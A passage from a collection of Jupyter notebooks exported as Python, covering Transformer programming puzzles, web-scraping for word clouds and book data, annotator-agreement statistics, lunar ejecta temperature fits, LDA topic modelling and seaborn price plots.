spec(*token_set)\n print(f\"Example {ex_num}. Args:\", token_set, \"Expected:\", out2)\n display(out1)\n out1 = out1.toseq()\n for i, o in enumerate(out2):\n assert out1[i] == o, f\"Output: {out1} Expected: {out2}\"\n\n pups = [\n \"2m78jPG\",\n \"pn1e9TO\",\n \"MQCIwzT\",\n \"udLK6FS\",\n \"ZNem5o3\",\n \"DS2IZ6K\",\n \"aydRUz8\",\n \"MVUdQYK\",\n \"kLvno0p\",\n \"wScLiVz\",\n \"Z0TII8i\",\n \"F1SChho\",\n \"9hRi2jN\",\n \"lvzRF3W\",\n \"fqHxOGI\",\n \"1xeUYme\",\n \"6tVqKyM\",\n \"CCxZ6Wr\",\n \"lMW0OPQ\",\n \"wHVpHVG\",\n \"Wj2PGRl\",\n \"HlaTE8H\",\n \"k5jALH0\",\n \"3V37Hqr\",\n \"Eq2uMTA\",\n \"Vy9JShx\",\n \"g9I2ZmK\",\n \"Nu4RH7f\",\n \"sWp0Dqd\",\n \"bRKfspn\",\n \"qawCMl5\",\n \"2F6j2B4\",\n \"fiJxCVA\",\n \"pCAIlxD\",\n \"zJx2skh\",\n \"2Gdl1u7\",\n \"aJJAY4c\",\n \"ros6RLC\",\n \"DKLBJh7\",\n \"eyxH0Wc\",\n \"rJEkEw4\"]\n print(\"Success!\")\n return HTML(\"\"\"\n \n \"\"\"%(random.sample(pups, 1)[0]))\nSEQ = [2,1,3,2,4]\nSEQ2 = [3, 4 ,3, -1, 2]\n\n\n# + [markdown] id=\"57d753ac\"\n# For each problem we will provide a Python specification. Your goal is to implement that specification with Transformers.\n\n# + [markdown] id=\"77441886\"\n# ### Challenge 0: Select the initial position\n#\n# Given a initial sequence compute a new sequence where all positions have the initial value. (1 line)\n\n# + id=\"1da74d03\"\ndef head_spec(seq):\n return [seq[0] for _ in seq]\n\ndef head(seq=tokens):\n return (key(indices) == query(0)).value(seq)\n \ntest_output(head, head_spec, [(SEQ,),(SEQ2,)])\n\n\n# + [markdown] id=\"f565d61c\"\n# ### Challenge 1: Select a given index\n#\n# Produce a sequence where all the elements have the value at index `i`.\n\n# + id=\"10d1b909\"\ndef index_spec(i, seq):\n return [seq[i] for _ in seq]\n\ndef index(i, seq=tokens):\n raise NotImplementedError\n\ntest_output(index, index_spec, [(2, SEQ), (3, SEQ2), (1, SEQ)])\n\n# + [markdown] id=\"a6c2b47d\"\n# ### Challenge 2: Shift\n#\n# Shift all of the tokens in a sequence to the right by `i` positions filling in the values with `default`. (1 line)\n\n# + id=\"d9b5db79\"\ndef shift_spec(i, default=\"0\", seq=None):\n return [default]*i + [s for j, s in enumerate(seq) if j < len(seq) - i]\n\ndef shift(i, default=\"0\", seq=tokens):\n raise NotImplementedError\n\ntest_output(shift, shift_spec, [(2, 0, SEQ), (3, 0, SEQ2), (1, 0, SEQ)])\n\n# + [markdown] id=\"3f87e538\"\n# ### Challenge 3: Right Align\n#\n# Right align a padded sequence e.g. ralign().inputs('xyz___') = '000xyz'\" (3 layers) (2 lines)\n\n\n# + id=\"a841d6f4\"\ndef ralign_spec(ldefault=\"0\", seq=tokens):\n last = None\n for i in range(len(seq)-1, -1, -1):\n if seq[i] == \"_\":\n last = i\n else:\n break\n if last == None:\n return seq\n return [ldefault] * (len(seq) - last) + seq[:last]\n\ndef ralign(ldefault=\"0\", seq=tokens):\n raise NotImplementedError\n\ntest_output(ralign, ralign_spec, [(\"-\", list(\"xyzabc__\"),), (\"0\", list(\"xyz___\"),)])\n\n# + [markdown] id=\"a178203a\"\n# ### Challenge 4: Split\n#\n# Split a sequence on a value. Get the first or second part. Right align. (5 lines)\n\n# + id=\"e69995ed\"\ndef split_spec(v, get_first_part, seq):\n out = []\n mid = False\n blank = \"0\" if not get_first_part else \"_\"\n for j, s in enumerate(seq):\n if s == v:\n out.append(blank)\n mid = True\n elif (get_first_part and not mid) or (not get_first_part and mid):\n out.append(s)\n else:\n out.append(blank)\n return ralign_spec(\"0\", seq=out)\n\ndef split(v, get_first_part, seq=tokens):\n raise NotImplementedError\n\ntest_output(split, split_spec,\n [(\"-\", 1, list(\"xyz-ax\"),),\n (\"-\", 0, list(\"xyz-ax\"),),\n (\"+\", 0, list(\"xy+z-ax\"),)]\n )\n\n# + [markdown] id=\"f9d19ecd\"\n# ### Challenge 5: Minimum \n#\n# Compute the minimum value of the sequence. This one starts to get harder! (5 lines of code)\n\n# + id=\"53b19ac8\"\ndef minimum_spec(seq):\n m = min(seq)\n return [m for _ in seq]\n\ndef minimum(seq=tokens):\n raise NotImplementedError\n\ntest_output(minimum, minimum_spec, [(SEQ,), (SEQ2,), ([2, 1, 1],)])\n\n# + [markdown] id=\"6d2fe8ec\"\n# ### Challenge 6: First Index\n#\n# Compute the first index that has token `token`. (1 line)\n\n# + id=\"a4a6a030\"\ndef first_spec(token, seq):\n first = None\n for i, s in enumerate(seq):\n if s == token and first is None:\n first = i\n return [first for _ in seq]\n\ndef first(token, seq=tokens):\n raise NotImplementedError\n\ntest_output(first, first_spec, [(3, SEQ), (-1, SEQ2), ('l', list('hello'))])\n\n# + [markdown] id=\"38236f00\"\n# ### Challenge 7: Slide\n#\n# Replace special tokens \"<\" with the closest non \"<\" value to their right. (4 lines of code)\n\n# + id=\"7781c97c\"\ndef slide_spec(match, seq):\n out = []\n for i, s in enumerate(seq):\n if s == \"<\":\n for v in seq[i+1:]:\n if v != \"<\":\n out.append(v)\n break\n else:\n out.append(s)\n return out\n\ndef slide(match=\"<\", seq=tokens):\n raise NotImplementedError\n\ntest_output(slide, slide_spec,\n [(\"<\", list(\"1<<2\"),),\n (\"<\", list(\"2<<<3\"),),\n (\"<\", list(\"3<<<1<<3\"),)]\n )\n\n# + [markdown] id=\"6be44511\"\n# ### Final Challenge: Adder\n#\n# Now we will put everything together. Here are the steps. \n#\n# add().input(\"683+345\")\n#\n# 0) Split into parts. Convert to ints. Add\n#\n# > \"683+345\" => [0, 0, 0, 9, 12, 8]\n#\n# 1) Compute the carry terms. Three possibilities: 1 has carry, 0 no carry, < maybe has carry. \n#\n# > [0, 0, 0, 9, 12, 8] => \"00<100\"\n#\n# 2) Slide the carry coefficients\n#\n# > \"00<100\" => 001100\"\n#\n# 3) Complete the addition.\n#\n# Each of these is 1 line of code. \n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 96} id=\"11b27d5b\" outputId=\"b1224ef6-c889-40ab-f051-fd00e37ceb2a\"\n# The function atoi lets us convert from string to sequences of integers\natoi(tokens).input(\"1321\")\n\n\n# + id=\"3370d2c8\"\ndef add_spec(seq):\n a, b = \"\".join(seq).split(\"+\")\n c = int(a) + int(b)\n out = f\"{c}\"\n return list(map(int, list((\"0\" * (len(seq) - len(out))) + out)))\n\n\n# + id=\"98a331c6\"\ndef add(seq=tokens):\n x = atoi(split(\"+\", True, seq)) \\\n + atoi(split(\"+\", False, seq))\n # 1) Check for carries \n gets_carry = shift(-1, \"0\", where(x > 9, \"1\", where(x == 9, \"<\", \"0\")))\n # 2) Slide carries to their columns - all in one parallel go! \n gets_carry = atoi(slide(\"<\", gets_carry))\n # 3) Add in carries, and remove overflow from original addition. \n return (x + gets_carry) % 10\n\n\n# + id=\"7f1f708c\"\ntest_output(add, add_spec,\n [(list(\"1+2\"),),\n (list(\"22+384\"),),\n (list(\"3+10\"),)]\n )\n","repo_name":"srush/Transformer-Puzzles","sub_path":"TransformerPuzzlers.ipynb","file_name":"TransformerPuzzlers.ipynb","file_ext":"py","file_size_in_byte":10473,"program_lang":"python","lang":"en","doc_type":"code","stars":157,"dataset":"github-jupyter-script","pt":"37"} +{"seq_id":"39308922557","text":"# # Word cloud on Project descriptions\n#\n# Generating a word cloud from the descriptions of the live [DataCamp Projects](https://datacamp.com/projects/). We will have to first scrape them and then use them to generate the word cloud. Let's begin. \n\n# +\n# Dependencies\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport numpy as np\n\nfrom PIL import Image\nfrom wordcloud import WordCloud, STOPWORDS, ImageColorGenerator\nimport matplotlib.pyplot as plt\n\n# %matplotlib inline\n\n# +\n# The main URL where all the project names and their descriptions can be found\nroot_url = 'https://www.datacamp.com/projects/'\n\n# Necessary for scrapping\nheaders = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) \\\nChrome/71.0.3578.98 Safari/537.36'}\n\n# +\n# Begin the scrapping process\ndescriptions = []\n\nproject_data = requests.get(root_url, headers=headers)\nsoup = BeautifulSoup(project_data.text, 'html.parser')\nres = soup.find_all('small', attrs={'class': 'dc-project-block__description'})\n\nfor entry in res:\n descriptions.append(entry.get_text())\n\ndescriptions_df = pd.DataFrame(data = descriptions, columns = ['project_description'])\n# -\n\ndescriptions_df.head()\n\n# ## Duplicates shall not pass\n\ndescriptions_df.drop_duplicates(inplace=True)\n\n# ## Word cloud with the first description\n\n# +\n# Start with the first description :)\ntext = descriptions_df.project_description[0]\n\n# Create and generate a word cloud image\nwordcloud = WordCloud().generate(text)\n\n# Display the generated image\nplt.imshow(wordcloud, interpolation='bilinear')\nplt.axis(\"off\")\nplt.show()\n# -\n\n# Tweak some of the arguments to give it an elegant look\nwordcloud = WordCloud(max_font_size=50, max_words=5, background_color=\"white\").generate(text)\nplt.figure()\nplt.imshow(wordcloud, interpolation=\"bilinear\")\nplt.axis(\"off\")\nplt.show()\n\n# Does not make much sense up until now. Let's take the remaining the descriptions and merge in a big DataFrame.\n\ntext = \" \".join(description for description in descriptions_df.project_description)\nprint (\"There are {} words in the merging of all the descriptions.\".format(len(text)))\n\n# ## Combining the descriptions\n\n# +\n# Create stopword list\nstopwords = set(STOPWORDS)\nstopwords.update(['bees']) # Might be good idea to discard this word\n\n# Generate a word cloud image\nwordcloud = WordCloud(stopwords=stopwords, background_color=\"white\").generate(text)\n\n# Construct and display the generated image\nplt.figure(figsize=(15,15))\nplt.imshow(wordcloud, interpolation='bilinear')\nplt.axis(\"off\")\nplt.show()\n# -\n\n# ## Masking the word cloud according to the DataCamp logo\n\n# ![](https://cdn.datacamp.com/main-app/assets/brand/logos/DataCamp_Icon_RGB-a3afe004da4a462151b8e87a89937603ea50534f338d4600cb11043a9cc434c9.png)\n\n# Load in the Datacamp logo to use as mask\ndatacamp_logo = np.array(Image.open(\"image/DataCamp_Logo.png\"))\ndatacamp_logo\n\n\n# These pixel intensities (0-valued) won't serve good as a mask image. We will have to convert it to 255.\n\ndef transform_pixels(pixel):\n if pixel == 0:\n return 255\n else:\n return pixel\n\n\n# +\n# Transform the mask into a new one that will work with the function\ntransformed_pixels = np.ndarray((datacamp_logo.shape[0],datacamp_logo.shape[1]), np.int32)\n\nfor i in range(len(datacamp_logo)):\n transformed_pixels[i] = list(map(transform_pixels, datacamp_logo[i]))\n\n# +\n# Reconstruct a word cloud\nwc = WordCloud(background_color=\"white\", max_words=1000, mask=transformed_pixels,\n stopwords=stopwords, contour_width=3, contour_color='#4fc3f7')\n\n# Generate a word cloud image\nwc.generate(text)\n\n# Display\nplt.figure(figsize=[20,10])\nplt.imshow(wc, interpolation='bilinear')\nplt.axis(\"off\")\n# -\n\n# Save the image\nwordcloud.to_file(\"image/datacamp_wordcloud.png\")\n","repo_name":"sayakpaul/Generating-Word-Cloud-from-DataCamp-Project-Descriptions","sub_path":"Word cloud on Project descriptions.ipynb","file_name":"Word cloud on Project descriptions.ipynb","file_ext":"py","file_size_in_byte":3781,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-jupyter-script","pt":"37"} +{"seq_id":"21132673103","text":"# + [markdown] id=\"oNsy7j_-x9tK\"\n# # Label Comparison\n#\n# **Task:** create an analytical program that compares BEND labeling between two different annotators.\n#\n# **Research Questions:**\n#\n# 1) Are humans good detectors of the maneuvers?\n#\n# 2) Are some maneuvers easier to detect by humans than others?\n#\n# 3) How much overlap is there between labelers? Do they more or less match in what they are labeling?\n#\n# 4) What is the correlation between the maneuvers and the agreement of labels between annotators? Calculate the agreement by maneuver between two coders. Maybe this goes back somewhat to question 2.\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"pvo7kJ9nxfd1\" outputId=\"5c0e73ec-01e7-49f4-802b-74775b0e6b34\"\n# setting up drive for data import\n\nimport os\nimport tarfile\nimport urllib\n\nfrom google.colab import drive\ndrive.mount('/content/drive')\n\nimport pandas as pd\n\nDATASET_PATH = \"/content/drive/MyDrive/Completed\"\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"iVygq0vNZuuG\" outputId=\"a69afcf0-0259-473f-aebd-5d4b010525b9\"\nfrom sklearn.metrics import cohen_kappa_score\nimport numpy as np\n\n# processing data for calculation, including loading and binarizing\n\nBEND_labels = ['Engage', 'Explain', 'Excite', 'Enhance', 'Dismiss', 'Distort', 'Dismay', 'Distract', 'Back', 'Build', 'Bridge', 'Boost', 'Neutralize', 'Nuke', 'Narrow', 'Neglect', 'NONE']\ncompleted_datasets = [\"CapnMarvel_1_aahmad1.csv\", \"CapnMarvel_1_yucongw.csv\", \"CapnMarvel_2_TPedireddi.csv\", \"CapnMarvel_2_yucongw.csv\", \"Election2020_20201102_4_aahmad1.csv\", \"Election2020_20201102_4_coco.csv\"]\n\ndef load_data(data_path):\n df = pd.read_csv(os.path.join(DATASET_PATH, data_path))\n df[\"maneuver\"] = df[\"maneuver\"].fillna(\"NONE\")\n return df[\"maneuver\"].tolist()\n\ndef binarize(maneuver, data):\n return [1 if maneuver in x else 0 for x in data]\n\n# implementing cohen's kappa\n\ndef calculate_kappa():\n kappas = []\n for x in BEND_labels:\n binarized1 = binarize(x, annotator1)\n binarized2 = binarize(x, annotator2)\n kappas.append(cohen_kappa_score(binarized1, binarized2))\n return kappas\n\ndef overall_agreement(scores):\n return sum(scores) / len(scores)\n\n# calculating annotator agreement through multiple datasets\n\narr_scores = np.zeros(17)\n\nfor i in range(0, 6, 2):\n annotator1 = load_data(completed_datasets[i])\n annotator2 = load_data(completed_datasets[i+1])\n arr_scores = np.add(np.array(calculate_kappa()), arr_scores)\n\narr_scores /= len(completed_datasets) / 2\n\n# printing results\n\nprint(\"Annotator agreement by maneuver:\")\nfor i in range(0, 17):\n print('%-15s' '%s' % (BEND_labels[i], arr_scores[i]))\nprint(f'Overall agreement between both annotators: {overall_agreement(arr_scores)}')\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"Yj5o4bkTvG0b\" outputId=\"5544ec6b-96c1-4482-9c8a-2f8049de5ca5\"\n# calculating frequencies of maneuvers in the datasets\n\ntotal_frequencies = np.zeros(17)\n\ndef frequency(annotations):\n maneuver_frequencies = []\n for x in BEND_labels:\n binarized = binarize(x, annotations)\n maneuver_frequencies.append(sum(binarized))\n return maneuver_frequencies\n\nfor i in range(0, 6):\n total_frequencies = np.add(total_frequencies, frequency(load_data(completed_datasets[i])))\n\nprint(\"Frequency of maneuvers:\")\nfor i in range(0, 17):\n print('%-15s' '%s' % (BEND_labels[i], total_frequencies[i]))\n\npercentages = np.divide(total_frequencies, sum(total_frequencies))\npercentages = np.multiply(percentages, 1000)\n\nprint(\"Percent frequency of maneuvers:\")\nfor i in range(0, 17):\n print('%-15s' '%s' % (BEND_labels[i], percentages[i]))\n\n# + [markdown] id=\"0QI8Vju2-tq-\"\n# # Interpreting Cohen's kappa\n#\n# `<0`: no agreement\n#\n# `0-0.20`: slight agreement\n#\n# `0.21-0.40`: fair agreement\n#\n# `0.41-0.60`: moderate agreement\n#\n# `0.61-0.80`: substantial agreement\n#\n# `0.81-1`: perfect agreement\n","repo_name":"viridescentavian/BEND-annotator-agreement","sub_path":"Annotator_Agreement.ipynb","file_name":"Annotator_Agreement.ipynb","file_ext":"py","file_size_in_byte":3848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"37"} +{"seq_id":"34884945711","text":"# #!pip install beautifulsoup4\nimport requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nimport pandas as pd\nimport numpy as np\n\n# +\n#classics\nurl = 'http://books.toscrape.com/catalogue/category/books/science-fiction_16/index.html'\n \nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'}\npage = requests.get (url, headers=headers)\n\nsoup = BeautifulSoup (page.text, 'html.parser')\n# -\n\nbooks = soup.find('ol', class_='row')\n#books_list = products.find_all('li', class_='col-xs-6 col-sm-4 col-md-3 col-lg-3')\n\n# +\n#name\nbooks_list = books.find_all('a')\nbooks_name = [p.get('title') for p in books_list]\nbooks_name = list(filter(None, books_name))\ndf_name = pd.DataFrame(books_name, columns = ['name'])\n\ndf_name\n\n# +\n#rating\nbooks_list = books.find_all('p', class_='star-rating')\nbooks_rating = [p.get('class') for p in books_list]\nrates = []\nfor i in range(len(books_rating)):\n rates.append(books_rating[i][1])\ndf_rate = pd.DataFrame(rates, columns=['rating'])\n\ndf_rate\n\n# +\n#price\nbooks_list = books.find_all( 'p', class_='price_color' )\nbooks_price = [p.get_text().replace('Â','') for p in books_list]\ndf_price = pd.DataFrame(books_price, columns = ['price'])\n\ndf_price\n\n# +\n#availability\nbooks_list = books.find_all( 'p', class_='instock availability' )\nbooks_available = [p.get_text().replace('\\n','') for p in books_list]\ndf_available = pd.DataFrame(books_available, columns = ['availability'])\n\ndf_available\n\n# +\n#classics dataframe\ndf_classics = pd.DataFrame([books_name, rates, books_price, books_available]).T\ndf_classics.columns = ['name', 'price', 'rating', 'availability']\n\ndf_classics\n","repo_name":"HenriqueCR1291/star_jeans","sub_path":"m01_books_scrape.ipynb","file_name":"m01_books_scrape.ipynb","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"37"} +{"seq_id":"73075262508","text":"# # Fernandes and Artemieva (2012) LPSC abstract\n#\n# Modeled Imbrium impact shock, ejecta temps vs distance for \"ancient-cold-moon\" and \"present-hot-moon\".\n#\n# Fig 4 shows thickness and temp vs distance for a 100 km diameter impactor.\n#\n# Imbrium assumed to have a 769 km transient crater diameter\n\n# +\nimport numpy as np\nimport matplotlib.pyplot as plt\ndiam = 769 # [km]\nT0 = 235 # [K]\nT0_cold = 260#210 # [K] Fig 4. proximal, cold\nT0_hot = 420#290 # [K] Fig 4. proximal, hot\ndt_hot = 15 # [K/km]\ndt_cold = 2 # [K/km]\ndepth = np.linspace(0, diam/10, 1000)\nT_hot = T0 + dt_hot * depth\nT_cold = T0 + dt_cold * depth\nplt.plot(depth, T_hot, 'r', label='Hot')\nplt.plot(depth, T_cold, 'b', label='Cold')\n\nd_cold = depth[np.argmin(np.abs(T_cold - T0_cold))]\nd_hot = depth[np.argmin(np.abs(T_hot - T0_hot))]\nplt.axvline(d_cold, color='b', linestyle='--')\nplt.axvline(d_hot, color='r', linestyle=':')\nplt.xlabel('Depth [km]')\nplt.ylabel('Temperature [K]')\nplt.legend()\n# -\n\ndepth = np.arange(80)\ndt_hot = 25 # [K/km]\ndt_cold = 10 # [K/km]\nT_hot = T0 + dt_hot * depth\nT_cold = T0 + dt_cold * depth\nplt.plot(depth, T_hot, 'r', label='Hot')\nplt.plot(depth, T_cold, 'b', label='Cold')\n\n# +\nfrom moonpies import moonpies as mp\nfrom moonpies import config\ncfg = config.Cfg()\n\nfig, ax = plt.subplots(figsize=(5, 5))\ndf = mp.get_crater_basin_list()\n\nd_imb = 769*1e3 # [m] Imbrium, basin diam used in Fernandes and Artemieva\nd_crater = df[~df.isbasin].diam.max() # [m] largest non-basin crater\nd_basin_max = df[df.isbasin].diam.max() # [m] largest basin\n\ndist = np.linspace(d_imb, d_imb*7)\nfor diam, label in zip((d_imb, d_crater), ('Imbrium', 'Crater')): \n dist_crad = dist / (diam/2)\n thick = mp.get_ejecta_thickness(dist.reshape(1, -1), np.atleast_1d(diam/2), cfg).squeeze()\n mass = thick * cfg.target_density # [kg/m^2]\n vel = mp.ballistic_velocity(dist, cfg)\n\n # Use only kinetic energy in excess of ke_heat_frac_speed\n v_excess = vel - cfg.ke_heat_frac_speed\n v_excess[v_excess < 0] = 0\n\n # Get KE and scale by fraction converted to heat\n heat_frac = cfg.ke_heat_frac\n ke = heat_frac * mp.kinetic_energy(mass, v_excess)\n\n # Get temps and plot\n x = dist.squeeze() / 1e3 # [km]\n if label == 'Crater':\n t0_c = cfg.polar_ejecta_temp_init\n dt_c = mp.delta_t_impact(ke, mass, mp.specific_heat_capacity(t0_c, cfg))\n t_dist = t0_c + dt_c\n end = np.argmin(np.abs(dist_crad - 20)) # 10 crater radii\n ax.plot(x[:end], t_dist[:end], '-', c='tab:orange', label='Crater')\n else:\n t0_cold = cfg.basin_ejecta_temp_init_cold\n t0_warm = cfg.basin_ejecta_temp_init_warm \n dt_cold = mp.delta_t_impact(ke, mass, mp.specific_heat_capacity(t0_cold, cfg))\n dt_warm = mp.delta_t_impact(ke, mass, mp.specific_heat_capacity(t0_warm, cfg))\n t_dist_cold = t0_cold + dt_cold\n t_dist_warm = t0_warm + dt_warm\n ax.plot(x, t_dist_cold, '-', c='tab:blue', label='Basin cold')\n ax.plot(x, t_dist_warm, '-', c='tab:red', label='Basin warm')\n \nax.axvline(4*d_imb / 2e3, c='gray', ls='-.')\nax.axvline(4*d_basin_max / 2e3, c='k', ls='-.')\nax.set_xlabel('Distance [km]')\nax.set_ylabel('Temperature [K]')\nax.set_xlim(750, 6000)\n# ax.set_ylim(140, 600)\n\n# Points for Imbrium from Fig. 4, Fernandes and Artemieva (2012)\nfernandes_dist = np.array([1400, 2040, 2825, 3675, 4500, 5200])\nfernandes_cold = np.array([260, 260, 300, 350, 480, 500])\nfernandes_warm = np.array([420, 420, 440, 460, 540, 600])\nax.plot(fernandes_dist, fernandes_warm, 'ro-', label='Fernandes warm')\nax.plot(fernandes_dist, fernandes_cold, 'bo-', label='Fernandes cold')\n\n# Fit to Fernandes and Artemieva (2012)\ncrad = fernandes_dist / (d_imb/2)\nxrad = x / (d_imb/2)\npcb, pca = np.polyfit(fernandes_dist, np.log(fernandes_cold), 1)\n# ax.plot(x, np.exp(pca+xrad*pcb), 'b--', label='Fernandes cold fit')\n\npcold = np.polyfit(crad, fernandes_cold, 2)\nfcold = np.poly1d(pcold)\nax.plot(x, fcold(xrad), 'b--', label='Fernandes cold fit')\nprint(f'basin_ejecta_temp_params_cold: {np.array2string(pcold, precision=3)}')\n\npwarm = np.polyfit(crad, fernandes_warm, 2)\nfwarm = np.poly1d(pwarm)\nax.plot(x, fwarm(xrad), 'r--', label='Fernandes warm fit')\nprint(f'basin_ejecta_temp_params_warm: {np.array2string(pwarm, precision=3)}')\n\n# axb = ax.twinx()\n# axb.plot(x, thick, 'k--', label='Ejecta thickness')\n# axb.set_ylabel('Ejecta thickness [m]')\n# axb.set_ylim(100, 500)\nax.legend()\nplt.show()\n","repo_name":"cjtu/moonpies","sub_path":"notebooks/bsed_temp_fernandes_artemieva.ipynb","file_name":"bsed_temp_fernandes_artemieva.ipynb","file_ext":"py","file_size_in_byte":4457,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-jupyter-script","pt":"37"} +{"seq_id":"2478626155","text":"import json\nfrom tqdm.notebook import tqdm\nfrom collections import Counter\n\nfilename = \"correct.txt\"\n\ndata = []\n\nwith open(filename, \"r\") as fin:\n for line in tqdm(fin):\n obj = json.loads(line)\n \n if \"abstract\" in obj and \"year\" in obj:\n if obj[\"year\"] > 2020:\n data.append(obj[\"abstract\"])\n\nlen(data)\n\n# +\nimport nltk\nnltk.download('stopwords')\nnltk.download('averaged_perceptron_tagger')\nnltk.download('punkt')\nnltk.download('wordnet')\nnltk.download('omw-1.4')\nfrom nltk.corpus import stopwords, wordnet\nfrom nltk.stem import WordNetLemmatizer\nfrom string import punctuation\nimport re\nenglish_stopwords = stopwords.words(\"english\")\nlemmatizer = WordNetLemmatizer()\n\n\ndef pos_tagger(nltk_tag):\n if nltk_tag.startswith('J'):\n return wordnet.ADJ\n elif nltk_tag.startswith('V'):\n return wordnet.VERB\n elif nltk_tag.startswith('N'):\n return wordnet.NOUN\n elif nltk_tag.startswith('R'):\n return wordnet.ADV\n else:\n return None\n\n\n# Удаление знаков пунктуации из текста\ndef remove_punct(text):\n table = {33: ' ', 34: ' ', 35: ' ', 36: ' ', 37: ' ', 38: ' ', 39: ' ', 40: ' ', 41: ' ', 42: ' ', 43: ' ', 44: ' ', 45: ' ', 46: ' ', 47: ' ', 58: ' ', 59: ' ', 60: ' ', 61: ' ', 62: ' ', 63: ' ', 64: ' ', 91: ' ', 92: ' ', 93: ' ', 94: ' ', 95: ' ', 96: ' ', 123: ' ', 124: ' ', 125: ' ', 126: ' '}\n return text.translate(table)\n\ndef preprocess(data):\n data = map(lambda x: x.lower(), data)\n data = map(lambda x: remove_punct(x), data)\n data = map(lambda x: re.sub(r'\\d+', ' ', x), data)\n \n data = map(lambda x: x.split(' '), data)\n data = map(lambda x: [token for token in x if token not in english_stopwords\\\n and token != \" \" \\\n and token.strip() not in punctuation], data)\n \n data = map(lambda x: ' '.join(x), data)\n \n data = list(data)\n \n result = []\n for every in tqdm(data):\n pos_tagged = nltk.pos_tag(nltk.word_tokenize(every))\n wordnet_tagged = list(map(lambda x: (x[0], pos_tagger(x[1])), pos_tagged))\n\n lemmatized_sentence = []\n for word, tag in wordnet_tagged:\n if tag is None:\n lemmatized_sentence.append(word)\n else:\n lemmatized_sentence.append(lemmatizer.lemmatize(word, tag))\n lemmatized_sentence = \" \".join(lemmatized_sentence)\n\n result.append(lemmatized_sentence)\n \n return result\n\n\n# -\n\nclean_data = preprocess(data)\n\nlen(clean_data)\n\nimport pickle\n\nwith open(\"clean_data_abstract.pkl\", \"wb\") as fout:\n pickle.dump(clean_data, fout)\n\n# ### LDA\n\nlist_of_list_of_tokens = list(map(lambda x: x.split(' '), clean_data))\n\nfor i in range(len(list_of_list_of_tokens)):\n list_of_list_of_tokens[i] = list(filter(lambda x: len(x) > 3, list_of_list_of_tokens[i]))\n\n# +\nfrom gensim import corpora, models\n\ndictionary_LDA = corpora.Dictionary(list_of_list_of_tokens)\ndictionary_LDA.filter_extremes(no_below=3)\ncorpus = [dictionary_LDA.doc2bow(list_of_tokens) for list_of_tokens in list_of_list_of_tokens]\n# -\n\nnum_topics = 20\n# %time lda_model = models.LdaModel(corpus, num_topics=num_topics, \\\n# id2word=dictionary_LDA, \\\n# passes=4, alpha=[0.01]*num_topics, \\\n# eta=[0.01]*len(dictionary_LDA.keys()))\n\nfor i, data in lda_model.show_topics(num_topics=20, formatted=False):\n for word, p in sorted(data, key=lambda x: x[1], reverse=True):\n print(f\"{word}\", end=\" \")\n print(\"\\n---------\")\n\nlda_model.save('lda.model')\n\n# +\nmodel = models.LdaModel.load('lda.model')\n\n# print all topics\nmodel.show_topics(num_topics=20)\n# -\n\n\n","repo_name":"tupiznak/made-project","sub_path":"backend/ml/analyze/LDA_abstact.ipynb","file_name":"LDA_abstact.ipynb","file_ext":"py","file_size_in_byte":3856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"37"} +{"seq_id":"30471244822","text":"# +\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport requests\nimport io\nimport seaborn as sns\nfrom numpy import nan\n\nurl = 'https://raw.githubusercontent.com/colettegabriel/capstone_1/master/styles.csv'\ndata_file = requests.get(url).content\ndf = pd.read_csv(io.StringIO(data_file.decode('utf-8')))\ndf['reduction'] = np.where(df['price_disc'] < df['price_us'], df['price_us']-df['price_disc'], np.nan)\npd.options.mode.chained_assignment = None\n# -\n\ndf.head(10)\n\n\n# + active=\"\"\n#\n\n# +\ndef price_filter(df, category, cat_filter, price):\n price_filter = df.loc[df[category]== cat_filter][price]\n return price_filter\n\nx = price_filter(df,'masterCategory','Accessories','price_us')\ny = price_filter(df,'masterCategory','Apparel','price_us')\nz = price_filter(df,'masterCategory','Footwear','price_us')\n\n\nplt.figure(figsize=(20,5))\nbox_plot_data = [x,y,z]\nplt.boxplot(box_plot_data, patch_artist=True, vert=False, labels=['Accessories', 'Apparel', 'Footwear'])\n\n# +\nsns.set()\n\n#Multiple linear regression price over year\ng = sns.lmplot(x='year', y='price_us', hue='masterCategory',\n truncate=True, height=8, data=df)\n\n# Use more informative axis labels than are provided by default\ng.set_axis_labels(\"Regulary Price\", \"Year\")\nplt.title('Multiple Regression Lines: Price range by Category over time')\n\n\n# +\nsns.set(style=\"white\")\n\n# Plot price over year\nsns.relplot(x=\"year\", y=\"price_us\", hue=\"masterCategory\", size=\"masterCategory\",\n sizes=(40, 400), alpha=.5, palette=\"muted\",\n height=6, data=df)\n\n# +\nsns.set(style=\"whitegrid\")\n\ng = sns.factorplot(x=\"year\", y=\"price_us\", hue=\"masterCategory\", data=df,\n height=6, kind=\"point\", palette=\"pastel\",ci=95,dodge=True,join=False)\ng.despine(left=True)\ng.set_ylabels(\"Price\")\ng.set_xlabels(\"\")\nplt.title('Pointplot: Price range by Category over time')\nplt.show()\n\n# +\nsns.set(style=\"white\")\n\ng = sns.lmplot(y='price_us', \n x='year',\n hue='gender',\n data=df, # Data.\n col='masterCategory',\n fit_reg=False,\n ci=False,\n scatter_kws={'alpha':0.4})\ng.set_ylabels(\"Reg Price\")\ng.set_xlabels(\"Year\")\nplt.suptitle('Scatterplot: Regular price over time by Gender')\nplt.subplots_adjust(top=0.9)\nplt.show()\n\n# -\n\nsns.distplot(df['price_us']);\nplt.suptitle('Histogram with KDE: Regular Price')\n\n# +\nsns.set(style=\"white\")\n\ng = sns.jointplot(x=\"price_disc\", y=\"price_us\", data=df)\nplt.show()\n# 